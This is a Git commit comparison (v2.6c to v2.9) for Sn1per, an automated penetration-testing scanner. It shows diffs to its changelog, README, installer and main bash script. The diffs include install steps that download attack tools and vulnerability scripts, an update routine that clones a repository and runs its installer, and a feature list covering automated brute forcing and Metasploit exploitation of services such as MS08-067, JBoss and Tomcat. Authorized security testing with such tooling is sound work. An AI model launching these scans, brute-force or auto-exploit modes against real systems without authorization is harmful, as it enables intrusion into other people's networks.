BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: BitMaster:v2.6c
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a
...
compare: BitMaster:v2.9
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a

7 Commits
v2.6c ... v2.9

Author SHA1 Message Date
root
7c36aa07fd Sn1per by 1N3@CrowdShield 2017-11-18 23:35:55 -05:00
root
5b536188be Sn1per by 1N3CrowdShield 2017-11-16 23:01:22 -05:00
root
8aed89d29f Sn1per by 1N3CrowdShield 2017-09-18 12:40:20 -04:00
root
774c112c1c Sn1per by 1N3CrowdShield 2017-09-17 23:50:52 -04:00
root
2966b026c2 Sn1per by 1N3CrowdShield 2017-09-09 10:42:14 -04:00
root
a8d6cbd30e Sn1per by 1N3CrowdShield 2017-09-09 10:37:11 -04:00
root
16be943139 Sn1per by 1N3CrowdShield 2017-09-09 10:35:50 -04:00
7 changed files with 579 additions and 189 deletions
Expand all files Collapse all files

27
CHANGELOG.md
View File

@@ -1,8 +1,24 @@
## CHANGELOG:
* v2.6c - Fixed errors with GooHak
* v2.6c - Fixed syntax errors in sniper conditional statements
* v2.6b - Added CloudFail
* v2.6a - Fixed issue with [: ==: unary operator expected errors
* v2.9 - New improved fullportonly scan mode
* v2.9 - Added online check to see if there's an active internet connection
* v2.9 - Changed default browser to firefox to clear up errors in loot commmand
* v2.9 - Created uninstall.sh script to uninstall sniper
* v2.9 - Removed automatic workspace creation per scan
* v2.9 - Added curl timeout in update command to fix lag
* v2.9 - Fixed minor NMap UDP scan flag issue
* v2.9 - Added Metagoofil
* v2.9 - Updated theharvester scan options to include more results
* v2.8 - Improved discovery mode scan performance and output
* v2.8 - Improved fullportonly scan performance
* v2.8 - Improved startup performance options
* v2.8 - Added Cansina web/file brute force tool
* v2.8 - Added webporthttp and webporthttps modes
* v2.8 - Added custerd software enumeration tool
* v2.7 - Fixed issue with sniper update command and install.sh not running
* v2.7 - Fixed errors with GooHak
* v2.7 - Fixed syntax errors in sniper conditional statements
* v2.7 - Added CloudFail
* v2.7 - Fixed issue with [: ==: unary operator expected errors
* v2.6 - Added Blackarch Linux support
* v2.6 - Added $BROWSER variable to set default browser
* v2.5g - Updated README with update command
@@ -175,6 +191,3 @@
## FUTURE:
* Add auto logging and reporting to all scans
* Add HTML reporting for scans
* Add automated Wireless attacks to Sn1per
* Add automated MITM attacks to Sn1per
* Add web mode port option for customized web scans

6
README.md
View File

@@ -1,4 +1,4 @@
![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.jpg)
![alt tag](https://github.com/1N3/Sn1per/blob/master/sn1per-logo.png)
## ABOUT:
Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.
@@ -58,6 +58,8 @@ sniper <CIDR> discover
sniper <target> port <portnum>
sniper <target> fullportonly <portnum>
sniper <target> web <report>
sniper <target> webporthttp <port>
sniper <target> webporthttps <port>
sniper <target> nobrute <report>
sniper <targets.txt> airstrike <report>
sniper <targets.txt> nuke <report>
@@ -72,6 +74,8 @@ sniper update
* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
* **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.
* **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.
* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.

14
TODO.md
View File

@@ -1,7 +1,13 @@
###TODO:
* Add web port scans for directed web scans
* Add command line parsing of options/modes
sniper --target crowdshield.com --workspace crowdshield.com --report --bruteforce --web --recon --portscan
sniper --target crowdshield.com --kalionly --offline --webportonly 443
* Create a sniper-kali release to only use base Kali image toolsets
* Check if there's an active internet connection, if not, run offline mode
* Add automatic reporting and workspace creation for all scans by default
* Add proxy support for all scans
* Add various modes (airstrike,nuke,web,etc.) for discovery scans
* Add automatic reporting for all scans by default
* Add reporting for discover mode
* Create uninstall.sh script
* Add AWS security checks

13
install.sh
View File

@@ -32,12 +32,13 @@ mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
cp -Rf $PWD/* $INSTALL_DIR
mkdir $LOOT_DIR/osint 2> /dev/null
cp -Rf $PWD/* $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
pip install dnspython colorama tldextract urllib3 ipaddress
apt-get install xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
pip install dnspython colorama tldextract urllib3 ipaddress requests
echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
gem install rake
@@ -45,7 +46,7 @@ gem install ruby-nmap net-http-persistent mechanize text-table
echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
mkdir $PLUGINS_DIR
mkdir $PLUGINS_DIR 2> /dev/null
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
@@ -65,9 +66,11 @@ git clone --depth 1 https://github.com/drwetter/testssl.sh.git
git clone https://github.com/lunarca/SimpleEmailSpoofer
git clone https://github.com/arthepsy/ssh-audit
git clone https://github.com/m0rtem/CloudFail.git
git clone https://github.com/deibit/cansina
wget https://raw.githubusercontent.com/1N3/IntruderPayloads/master/FuzzLists/dirbuster-quick.txt -O /usr/share/sniper/plugins/cansina/dirbuster-quick.txt
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d496c730934965/scripts/http-vuln-INTEL-SA-00075.nse -O /usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse
cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse
cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/CloudFail/ && apt-get install python3-pip && pip3 install -r requirements.txt
cd $PLUGINS_DIR/Findsploit/ && bash install.sh

BIN
sn1per-logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 589 KiB

678
sniper
View File

@@ -1,97 +1,15 @@
#!/bin/bash
# + -- --=[Sn1per by 1N3
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://crowdshield.com
#
## ABOUT:
#Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.
## DEMO VIDEO:
#[![Sn1per Demo](https://img.youtube.com/vi/nA_V_u3QZA4/0.jpg)](https://www.youtube.com/watch?v=nA_V_u3QZA4)
## FEATURES:
#* Automatically collects basic recon (ie. whois, ping, DNS, etc.)
#* Automatically launches Google hacking queries against a target domain
#* Automatically enumerates open ports via NMap port scanning
#* Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
#* Automatically checks for sub-domain hijacking
#* Automatically runs targeted NMap scripts against open ports
#* Automatically runs targeted Metasploit scan and exploit modules
#* Automatically scans all web applications for common vulnerabilities
#* Automatically brute forces ALL open services
#* Automatically test for anonymous FTP access
#* Automatically runs WPScan, Arachni and Nikto for all web services
#* Automatically enumerates NFS shares
#* Automatically test for anonymous LDAP access
#* Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
#* Automatically enumerate SNMP community strings, services and users
#* Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
#* Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
#* Automatically tests for open X11 servers
#* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
#* Performs high level enumeration of multiple hosts and subnets
#* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
#* Automatically gathers screenshots of all web sites
#* Create individual workspaces to store all scan output
## FOR BLACKARCH
# no need to install, just pacman -S sniper
#
## KALI LINUX INSTALL:
#```
#./install.sh
#```
## DOCKER INSTALL:
#Docker Install:
#https://github.com/menzow/sn1per-docker
#Docker Build:
#https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
#Example usage:
#```
#$ docker pull menzo/sn1per-docker
#$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
#```
## USAGE:
#```
#sniper <target> <report>
#sniper <target> stealth <report>
#sniper <CIDR> discover
#sniper <target> port <portnum>
#sniper <target> fullportonly <portnum>
#sniper <target> web <report>
#sniper <target> nobrute <report>
#sniper <targets.txt> airstrike <report>
#sniper <targets.txt> nuke <report>
#sniper loot
#sniper update
#```
### MODES:
#* **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
#* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
#* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
#* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
#* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
#* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
#* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
#* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
#* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
#* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
## SAMPLE REPORT:
# https://gist.github.com/1N3/8214ec2da2c91691bcbc
VER="2.6c"
VER="2.9"
TARGET="$1"
MODE="$2"
OPT1="$3"
OPT2="$4"
DISABLE_POSTGRESQL="true"
BROWSER="iceweasel" # SET DEFAULT BROWSER FOR OPENING LOOT DIR. CAN ALSO SET TO xdg-open...
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
LOOT_DIR="/usr/share/sniper/loot"
PLUGINS_DIR="/usr/share/sniper/plugins"
@@ -103,9 +21,9 @@ USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3128,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_TCP_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3128,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152"
DEFAULT_UDP_PORTS="53,67,68,88,161,162,137,138,139,389,520,2049"
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
DEFAULT_UDP_PORTS="53,67,68,69,88,161,162,137,138,139,389,520,2049"
THREADS="30"
OKBLUE='\033[94m'
OKRED='\033[91m'
@@ -120,7 +38,7 @@ AUTOBRUTE="1"
# ENABLE/DISABLE FULL DETAILED NMAP SCAN
# DEFAULT IS "1" (ENABLED)
FULLNMAPSCAN="1"
FULLNMAPSCAN="0"
# ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
# DEFAULT IS "1" (ENABLED)
@@ -133,42 +51,73 @@ ENABLE_AUTO_UPDATES="1"
# CHECK DISTRO TYPE
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
# CHECK FOR BLACKARCH LINUX
if grep -q BlackArch /etc/issue; then
DISTRO='blackarch'
echo "Detected BlackArch GNU/Linux"
INSTALL_DIR=$(pwd)
echo "Setting current path to $INSTALL_DIR"
fi
function logo {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo ""
}
cd $INSTALL_DIR
function check_online {
ONLINE=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [ "$ONLINE" == "" ]; then
ONLINE="0"
echo -e "$OKBLUE[*] Checking for active internet connection [$RESET${OKRED}FAIL${RESET}$OKBLUE]"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper is running in offline mode.$RESET"
else
ONLINE="1"
echo -e "$OKBLUE[*] Checking for active internet connection [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
}
function check_update {
if [ "$ENABLE_AUTO_UPDATES" = "1" ]; then
# echo -e "$OKBLUE + -- --=[Checking for updates...$RESET"
LATEST_VER=$(curl -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [ -z "$ONLINE" ]; then
check_online
fi
if [ "$ENABLE_AUTO_UPDATES" == "1" ] && [ "$ONLINE" == "1" ]; then
LATEST_VER=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [ "$LATEST_VER" != "$VER" ]; then
echo -e "$OKRED + -- --=[Sn1per v$LATEST_VER is available to download... To update, type \"sniper update\" $RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper v$LATEST_VER is available to download... To update, type$OKRED \"sniper update\" $RESET"
fi
fi
}
function update {
echo -e "$OKBLUE + -- --=[Checking for updates...$RESET"
LATEST_VER=$(curl -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [ "$LATEST_VER" != "$VER" ]; then
echo -e "$OKRED + -- --=[Sn1per $LATEST_VER is available to download...Do you want to update? (y or n)$RESET"
read ans
if [ "$ans" = "y" ]; then
rm -Rf /tmp/Sn1per/ 2>/dev/null
git clone https://github.com/1N3/Sn1per /tmp/Sn1per/
bash /tmp/Sn1per/install.sh
rm -Rf /tmp/Sn1per/ 2>/dev/null
exit
logo
echo -e "$OKBLUE[*] Checking for updates...[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
check_online
if [ "$ONLINE" == "0" ]; then
echo "You will need to download the latest release manually at https://github.com/1N3/Sn1per/"
else
LATEST_VER=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [ "$LATEST_VER" != "$VER" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] Sn1per $LATEST_VER is available to download...Do you want to update? (y or n)$RESET"
read ans
if [ "$ans" = "y" ]; then
rm -Rf /tmp/Sn1per/ 2>/dev/null
git clone https://github.com/1N3/Sn1per /tmp/Sn1per/
bash /tmp/Sn1per/install.sh
rm -Rf /tmp/Sn1per/ 2>/dev/null
exit
fi
fi
fi
}
if [ "$TARGET" = "update" ]; then
update
exit
fi
function init {
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
@@ -177,8 +126,7 @@ function init {
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
service postgresql start 2>/dev/null
service metasploit start 2>/dev/null
/etc/init.d/metasploit start > /dev/null 2>&1 &
}
function loot {
@@ -189,8 +137,10 @@ function loot {
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[Current workspaces...$RESET"
cd $LOOT_DIR
echo -e "$OKORANGE + -- --=[Current reports...$RESET"
ls -lh /usr/share/sniper/loot/*.txt 2> /dev/null
echo -e "$OKORANGE + -- --=[Current workspaces...$RESET"
ls -lh $LOOT_DIR/workspace/
echo -e "$OKORANGE + -- --=[Enter a name for the workspace:$RESET"
read WORKSPACE
@@ -204,10 +154,6 @@ function loot {
# HTML OUTPUT
echo "$a" | aha --black > $LOOT_DIR/reports/$a.html
cat "$a" | aha --black >> $LOOT_DIR/reports/$a.html
# TEXT OUTPUT DISABLED
#echo "$a" | aha --black > $LOOT_DIR/reports/$a
#sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
# CONSOLE OUTPUT
mv $a $LOOT_DIR/output/
done
echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET"
@@ -227,6 +173,7 @@ function loot {
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/osint/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
@@ -240,8 +187,6 @@ function loot {
sleep 2
echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI...$RESET"
$BROWSER http://localhost:3001/login 2> /dev/null &
echo -e "$OKORANGE + -- --=[Launching Zenmap...$RESET"
zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
echo -e "$OKORANGE + -- --=[Done!$RESET"
}
@@ -255,7 +200,6 @@ function help {
echo ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo -e "$OKORANGE + -- --=[Usage:"
echo ""
echo ' [*] sniper <target> <report>'
echo ' [*] sniper <target> stealth <report>'
@@ -263,27 +207,15 @@ function help {
echo ' [*] sniper <target> port <portnum>'
echo ' [*] sniper <target> fullportonly <portnum>'
echo ' [*] sniper <target> web <report>'
echo ' [*] sniper <target> webporthttp <port>'
echo ' [*] sniper <target> webporthttps <port>'
echo ' [*] sniper <target> nobrute <report>'
echo ' [*] sniper <targets.txt> airstrike <report>'
echo ' [*] sniper <targets.txt> nuke <report>'
echo ' [*] sniper /full/path/to/targets.txt airstrike <report>'
echo ' [*] sniper /full/path/to/targets.txt nuke <report>'
echo ' [*] sniper loot'
echo ' [*] sniper update'
echo ""
echo ' + -- --=[Modes:'
echo ''
echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
echo ' + -- --=[FULLPORTONLY: Performs a full detailed port scan and saves results to XML.'
echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
echo ""
echo ""
check_update
}
if [ -z $TARGET ]; then
@@ -298,7 +230,6 @@ if [ -z $TARGET ]; then
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
echo ""
check_update
exit
fi
